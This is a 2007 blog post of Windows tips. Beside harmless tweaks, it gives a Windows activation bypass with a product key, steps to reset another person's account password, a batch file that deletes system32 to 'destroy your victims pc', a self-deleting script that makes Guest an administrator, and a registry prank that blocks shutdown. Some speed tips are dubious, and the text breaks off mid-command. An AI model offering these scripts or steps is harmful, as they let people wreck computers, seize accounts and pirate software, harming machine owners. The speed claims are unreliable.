Tuesday, September 11, 2007

Computer Tricks And Tips

windows validation

This method works better than many others i've tried before. forget the cracks and injectors etc... this is the BEST WAY:

1) start > run > "regedit" (without the quotes of course)

2) go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!

now close out regedit.

3) go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can do all the updates without activating, and the Genuine Microsoft Validation thing won't bug you no more!!
====================================================================
Make a simple folder lock yourself

copy following program:-

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

now go for following few steps
1>copy above folder into notepad.
2>the text which is written in bold letters delete it & type u r password there.
3>save that file by extension .bat ( name is u r choice)
4>now on ur screen there is a bat file appear.
5>double click on that file.
6>u will see the locker folder.
7>save the files in that folder.
8>double click on the bat file u created
9>after that folder will become hidden.
10>to open that folder double click on that bat file
11>type ur password & open that folder.
OR

Protect your Data without using a folder lock

Data protection: how to hide those nasty xxx pic’s!!!
1.Right-click with your mouse and select ‘new’
2.Then you will see a list of files you can create, pick ‘folder’
3.For now, name it ‘new folder’
4.Copy the data you want to hide into that folder
5.Then right-click on the folder and select ‘rename’
Give it one of the following names: (these are examples)
‘funny sound.{0003000D-0000-0000-C000-000000000046}’
‘control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}’
‘aX0023sys.{ECD4FC4F-521C-11D0-B792-00A0C90312E1}’
‘internet explorer.{FBF23B42-E3F0-101B-8488-00AA003E56F8}’
‘keys.{BD84B380-8CA2-1069-AB1D-08000948F534}’
‘Dial-Up networking.{992CFFA0-F557-101A-88EC-00DD010CCC48}’
All folder names are without the ‘ ‘
You can give the folder any name as long as you remember to put a. (point)
between the folder name and the number!
NOTE!: once you’ve protected a folder, also you can’t access it
normally! The only way to get access to the files is to move it
to the garbage bin and cut and paste it into an unprotected folder!
(Control-x control-v)
(You can also put in a .zip file)
====================================================================

♥♥♥ Change someone's windows password ♥♥♥

This hack works if you are at someone else's home and you are logged into the account of the person whose account you want to hack. This also works if you want to hack someone else's account on your pc bit do not know his/her password.

Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack. RIGHT CLICK and then click on SET PASSWORD from the pop-up menu.
Enter the new password. Click on OK.
There you have it. You have changed the user's password!
OR

Don't need to do such a big thing ..

Open dos
Type
net user

ner user username password

;)
====================================================================

Making a file that destroys your victims pc
1.Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\**/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created deletes all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)
====================================================================

Create your own messenger...

If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Hit Enter and start chatting..
====================================================================

This tricks will improve the speed & load time of firefox. And you will be able to surf faster..


Type about:config in the address bar, Then look for the following
entries, and make the corresponding changes.

1.network.http.max-connections = 64
2.network.http.max-connections-per-server =32
3.network.http.max-persistent-connections-per-proxy =16
4.network.http.max-persistent-connections-per-server = 10
5.network.http.pipelining = true
6.network.http.pipelining.maxrequests = 200
7.network.http.proxy.pipelining = true
8.network.http.proxy.version = 1.0
9.network.http.request.max-start-delay = 0
Lastly right-click anywhere and select New- Integer. Name it
nglayout.initialpaint.delay and set its value to 0. This value is
the amount of time the browser waits before it acts on information it recieves.Enjoy!!


You might have noticed that Firefox performs poorly when you surf for a long time or open lots of tabs at once. Many wrongly believe that this is due to some memory leak caused by extensions (even, I used to believe this).
This is actually caused because Firefox stores 50 most recently visited websites in a memory session inorder to speed up the pageload of the previously visited site.
Average web surfer tend to visit only 3 – 5 websites out of the previously visited websites, so you can reduce the resource hog by changing the memory threshold to 5 (or anything below 50).
This can be done by typing "about:config" in your Firefox address bar and search for "browser.sessionhistory.max_entries" (without quotes), right click on that entry and choose modify. Now set the value for 5 (or anything lower than 50).

====================================================================

increse ur internet Speed by another trick


follow the step:-
go to desktop->My computer-(right click on)->properties->then go HARDWARE tab->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

====================================================================


Hack Administrator Status

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
====================================================================

Change your Boot Screen

The image that is displayed during the boot is hidden away in a system file
called ntoskrnl.exe. This system file is loaded during the system boot
and is what displays the boot image and animation.
You can override this setting using BOOTSKIN software.First install the software
Using BootSkin to change your boot screen
Once you have the BootSkin application installed, start it up by using the link in the Start
menu under WinCustomize and perform the following steps:
1. Once you have the application running, changing the boot screen is very simple. Just
navigate through the list of boot screens by using the scrollbar arrows, as shown in
Figure below
2. Once you find the boot screen that you like, click the item and then click the Preview
button to see a full-screen animated preview of what the boot screen will look like.
3. Click a button on the mouse again to exit the full-screen preview. If you like the boot
screen, then click the Apply button. That’s it!
Once you reboot, your new boot screen will be displayed every time. If you would like to
change your boot screen back to the default Windows XP boot screen, reopen the BootSkin
program and select the default system boot screen from the top of the list; click Apply.
====================================================================

Preventing Windows from Shutting Down

Hey dis is a cool trick u can play on ur friends
u can prevent people from shutting down their computer
jus go to Run --> type regedit.exe
Scroll Down to this path -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
create a new dword value named NoClose by clicking on Edit --> New --> Dword Value
Set its Value Data to 1 to disable the shut down option
Have fun
TRY THIS OUT ! ENJOY>>>>>>>>>>>>>>>
====================================================================

TIMER FOR WINDOWS SHUTDOWN AND RESTART

This may be help to you if have the habit of listening to songs and sleeping or if you are planning to download some thing. open notepad and type
“shutdown -s -t